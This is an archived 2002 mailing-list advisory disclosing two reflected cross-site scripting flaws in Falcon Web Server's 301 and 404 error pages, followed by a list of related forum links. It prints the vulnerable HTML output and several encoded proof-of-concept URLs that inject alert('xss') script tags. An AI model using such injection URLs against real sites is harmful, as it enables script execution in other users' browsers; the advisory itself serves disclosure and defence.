Cross-Site Scripting Issues in Falcon Web Server

From: Matthew Murphy (mattmurphy@kc.rr.com)
Date: 08/09/02 

From: "Matthew Murphy" <mattmurphy@kc.rr.com>
To: "BugTraq" <bugtraq@securityfocus.com>, "Full Disclosure" <full-disclosure@lists.netsys.com>, "SecurITeam News" <news@securiteam.com>, "Vuln-Dev" <vuln-dev@securityfocus.com>
Date: Thu, 8 Aug 2002 18:31:20 -0500

From Developer:

"Falcon Web Server is running under Windows NT/2000/XP as well as Windows
95/98. It supports ISAPI and WinCGI, and it is a fully functional web
server which is capable of running a small / medium scale website of about
50-80 hits per minute. The real advantage of Falcon Web Server is the
ability to run on a desktop computer with almost the same functionality as
large-scale web servers like MS IIS and Apache."

A lack of input sanitation in the error message output of this server makes
it susceptible to two cross-site scripting vulnerabilities:

* An issue in the way the server handles 301 messages when a file is not
found, and the request is not terminated by a slash. Falcon simply adds a
slash to the request URI, and sends back a 301 with the following entity:

<html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>Redir
ecting browser to <a
href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><b
r>If nothing happens click the link above.</body></html>

* An issue in the way the server handles 404 messages when a file/folder is
not found, and the necessary slash has been added (entity below):

<html><head><title>HTTP/1.0 404 Not
Found</title></head><body><h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not
Found</h1><p>Cannot locate the requested file.</body></html>

Examples:

* 301 Message XSS

Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

* 404 Message XSS

http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

The 301 examples will simply add a slash and pass it on to the browser,
which then raises a 404, exploiting that vulnerability as well (although the
301 exploits will cause some useless HTML to be added on)

"The reason the mainstream is thought
of as a stream is because it is
so shallow."
                     - Author Unknown

Relevant Pages

  • Re: write with cURL
    ... execute permissions. ... This is assuming that the PHP script runs ... of potential security risks from other users on the same server. ... web server itself is part of the group. ...
    (alt.php)
  • Cross-Site Scripting Issues in Falcon Web Server
    ... "Falcon Web Server is running under Windows NT/2000/XP as well as Windows ... and the request is not terminated by a slash. ...
    (Bugtraq)
  • [Full-Disclosure] Cross-Site Scripting Issues in Falcon Web Server
    ... "Falcon Web Server is running under Windows NT/2000/XP as well as Windows ... and the request is not terminated by a slash. ...
    (Full-Disclosure)
  • Re: web service architecture question
    ... To assume that we have all the security we will ever need is a bad one. ... ways to breach a server, and the separatin of the web and app server is one ... You can use remoting or web services. ... The web server will be exposed outside the ...
    (microsoft.public.dotnet.framework.webservices)
  • RE: System.Data.SqlClient "Timeout expired" causing ASP.net web applic
    ... There are many values here that can shutdown the aspnet_wp. ... > update tables on a Web Server running SQL Server 2000. ... > formation(DataSet currentBalances): Timeout expired. ...
    (microsoft.public.dotnet.languages.vb)